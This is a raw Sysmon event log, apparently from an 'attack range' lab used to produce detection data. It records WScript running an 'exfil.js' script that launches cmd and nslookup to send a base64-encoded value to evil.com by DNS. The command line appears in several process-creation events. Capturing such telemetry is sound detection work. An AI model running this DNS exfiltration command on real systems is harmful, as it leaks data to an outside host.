23542300x8000000000000000206231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.132{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlftuqr.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.085{2E1864BB-18E4-629A-8342-000000005F02}21283796C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-8442-000000005F02}7708C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.085{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.085{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.085{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8442-000000005F02}7708C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.085{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.085{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.085{2E1864BB-18E4-629A-8242-000000005F02}16364036C:\Windows\system32\cmd.exe{2E1864BB-18E4-629A-8442-000000005F02}7708C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.093{2E1864BB-18E4-629A-8442-000000005F02}7708C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E4-629A-8242-000000005F02}1636C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlftuqr.tmp 2>&1 10341000x8000000000000000206222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.069{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-8342-000000005F02}2128C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.069{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-8342-000000005F02}2128C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.069{2E1864BB-18E4-629A-8342-000000005F02}21283796C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-8242-000000005F02}1636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.032{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8342-000000005F02}2128C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000206218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.016{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=901F71D26076515A3E4A1F013E1EEA15,SHA256=628A9C1B4B839BC71EAEF3C80F3D196772EA44329AC627044EF94EFA933E2AC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000206217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.016{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29C23CAEFC0E90621EA748EDED11F348,SHA256=08FC7E430F0FF6770938A30DD5A177853C4FF3B86EB86C9FC26B8F3C3C6BDF2C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.016{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.016{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.016{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.016{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.016{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8242-000000005F02}1636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.016{2E1864BB-18E0-629A-6742-000000005F02}39764832C:\Windows\System32\WScript.exe{2E1864BB-18E4-629A-8242-000000005F02}1636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.022{2E1864BB-18E4-629A-8242-000000005F02}1636C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlftuqr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x800000000000000044794Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:25.721{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7EF4DE6530C1746C96ABFD84E9587FB,SHA256=327A7943E9106509A1912364118FA6AA4530D1AEA2D27A63617D3D5633243E72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.988{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-CB42-000000005F02}3384C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.988{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-CB42-000000005F02}3384C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.988{2E1864BB-18E5-629A-CB42-000000005F02}33847688C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-CA42-000000005F02}8136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.972{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-CB42-000000005F02}3384C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.972{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.972{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.972{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.972{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.972{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-CA42-000000005F02}8136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.972{2E1864BB-18E0-629A-6742-000000005F02}39763364C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-CA42-000000005F02}8136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 